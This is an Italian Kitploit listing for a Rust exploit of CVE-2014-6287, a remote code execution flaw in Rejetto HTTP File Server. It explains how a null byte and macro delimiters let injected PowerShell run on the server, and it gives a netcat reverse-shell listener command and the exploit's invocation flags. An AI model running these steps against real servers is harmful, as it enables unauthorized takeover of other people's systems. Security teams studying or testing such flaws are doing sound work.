Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6287 — Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c. | Kitploit
Strumenti/GitHubGitHub/nika0x38/cve-2014-6287
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c.

Vedi Repository
111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2014-6287 - Exploit RCE per Rejetto HTTP File Server

Rust Security

Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c.

Panoramica della vulnerabilità

CVE-2014-6287 è una vulnerabilità critica di esecuzione remota di codice in Rejetto HTTP File Server (HFS).

Dettagli tecnici

  • Software interessato: Rejetto HTTP File Server (HFS) 2.3x precedente alla 2.3c
  • Tipo di vulnerabilità: Esecuzione remota di codice (RCE)
  • Punteggio CVSS: 10.0 (Critico)
  • CWE: CWE-94 (Improper Control of Generation of Code)

Descrizione

La funzione findMacroMarker in in Rejetto HTTP File Server consente ad attaccanti remoti di eseguire programmi arbitrari tramite una sequenza in un'azione di ricerca. Questa vulnerabilità consente agli attaccanti di aggirare la validazione dell'input e iniettare codice malevolo che viene eseguito sul sistema di destinazione.

parserLib.pas
%00

L'exploit funziona nel seguente modo:

  1. Creando una query di ricerca malevola contenente un byte nullo (%00)
  2. Iniettando comandi PowerShell all'interno dei delimitatori di macro {. e .}
  3. Il server elabora la macro ed esegue il codice PowerShell incorporato
  4. Stabilendo una connessione reverse shell verso l'attaccante

Utilizzo

Passo 1: Configurare un listener Netcat

Prima di eseguire l'exploit, configura un listener sulla tua macchina di attacco per ricevere la reverse shell:

root@kitploit:~
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>

Passo 2: Eseguire l'exploit

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Parametri obbligatori:

  • -l, --lhost <LHOST>: Il tuo indirizzo IP locale (macchina dell'attaccante)
  • -p, --lport <LPORT>: La tua porta locale per la reverse shell
  • -r, --rhost <RHOST>: Indirizzo IP del target (server HFS vulnerabile)

Parametri opzionali:

  • -t, --rport <RPORT>: Porta del target (predefinita: 80)

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. Utilizzalo in modo responsabile e solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione a

Scarica lo strumento